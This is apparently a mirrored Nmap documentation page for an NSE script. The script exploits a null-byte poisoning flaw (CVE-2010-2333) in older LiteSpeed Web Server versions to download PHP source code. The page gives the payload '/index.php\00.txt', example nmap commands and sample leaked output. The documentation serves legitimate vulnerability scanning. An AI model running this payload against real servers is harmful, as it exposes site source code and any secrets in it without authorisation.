File http-litespeed-sourcecode-download

脚本使用类型: portrule
脚本所属分类: vuln, intrusive, exploit
脚本下载地址: http://nmap.org/svn/scripts/http-litespeed-sourcecode-download.nse

User Summary

Exploits a null-byte poisoning vulnerability in Litespeed Web Servers 4.0.x before 4.0.15 to retrieve the target script's source code by sending a HTTP request with a null byte followed by a .txt file extension (CVE-2010-2333).

If the server is not vulnerable it returns an error 400. If index.php is not found, you may try /phpinfo.php which is also shipped with LiteSpeed Web Server. The attack payload looks like this:

• /index.php\00.txt

References:

• http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2333
• http://www.exploit-db.com/exploits/13850/

Script Arguments

http-litespeed-sourcecode-download.uri

URI path to remote file

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent

Example Usage

执行格式

nmap -p80 --script http-litespeed-sourcecode-download --script-args http-litespeed-sourcecode-download.uri=/phpinfo.php <host>
nmap -p8088 --script http-litespeed-sourcecode-download <host>

Script Output

PORT     STATE SERVICE    REASON
8088/tcp open  radan-http syn-ack
| http-litespeed-sourcecode-download.nse: /phpinfo.php source code:
| <HTML>
| <BODY>
|    <?php phpinfo() ?>
| </BODY>
|_</HTML>

Requires

• http
• nmap
• shortport
• stdnse
• string

Author: Paulino Calderon

License: VER007 整理 http://www.ver007.com